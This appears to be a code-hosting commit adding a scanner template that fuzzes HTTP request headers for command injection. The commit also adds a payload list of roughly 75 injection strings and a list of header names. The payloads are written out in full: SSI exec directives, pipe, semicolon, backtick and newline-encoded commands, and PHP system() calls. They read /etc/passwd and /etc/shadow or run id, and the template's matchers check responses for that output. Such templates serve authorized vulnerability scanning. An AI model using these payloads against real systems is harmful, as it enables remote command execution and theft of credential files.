PD-Team
GitHub
commit
9071ed2a2b
|
|
@ -0,0 +1,35 @@
|
|||
id: header-command-injection
|
||||
|
||||
info:
|
||||
name: Header Command Injection
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: Fuzzing headers for command injection
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
header: helpers/payloads/request-headers.txt
|
||||
payload: helpers/payloads/command-injection.txt
|
||||
|
||||
raw:
|
||||
- |
|
||||
GET /?§header§ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
§header§: §payload§
|
||||
Connection: close
|
||||
|
||||
attack: clusterbomb
|
||||
redirects: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
condition: and
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
|
|
@ -0,0 +1,75 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
;system('cat%20/etc/passwd')
|
||||
;id;
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
|/usr/bin/id|
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
||||
$;/usr/bin/id
|
||||
$(`cat /etc/passwd`)
|
||||
cat /etc/passwd
|
||||
%0Acat%20/etc/passwd
|
||||
{{ get_user_file("/etc/passwd") }}
|
||||
<!--#exec cmd="/bin/cat /etc/passwd"-->
|
||||
<!--#exec cmd="/usr/bin/id;-->
|
||||
system('cat /etc/passwd');
|
||||
<?php system("cat /etc/passwd");?>
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
Accept
|
||||
Accept-Charset
|
||||
Accept-Datetime
|
||||
Accept-Encoding
|
||||
Accept-Language
|
||||
Authorization
|
||||
Cache-Control
|
||||
Connection
|
||||
Content-Length
|
||||
Content-MD5
|
||||
Content-Type
|
||||
Cookie
|
||||
Date
|
||||
Expect
|
||||
Forwarded
|
||||
From
|
||||
Host
|
||||
If-Match
|
||||
If-Modified-Since
|
||||
If-None-Match
|
||||
If-Range
|
||||
If-Unmodified-Since
|
||||
Max-Forwards
|
||||
Origin
|
||||
Pragma
|
||||
Proxy-Authorization
|
||||
Range
|
||||
Referer
|
||||
TE
|
||||
Upgrade
|
||||
User-Agent
|
||||
Via
|
||||
Warning
|
||||
Loading…
Reference in New Issue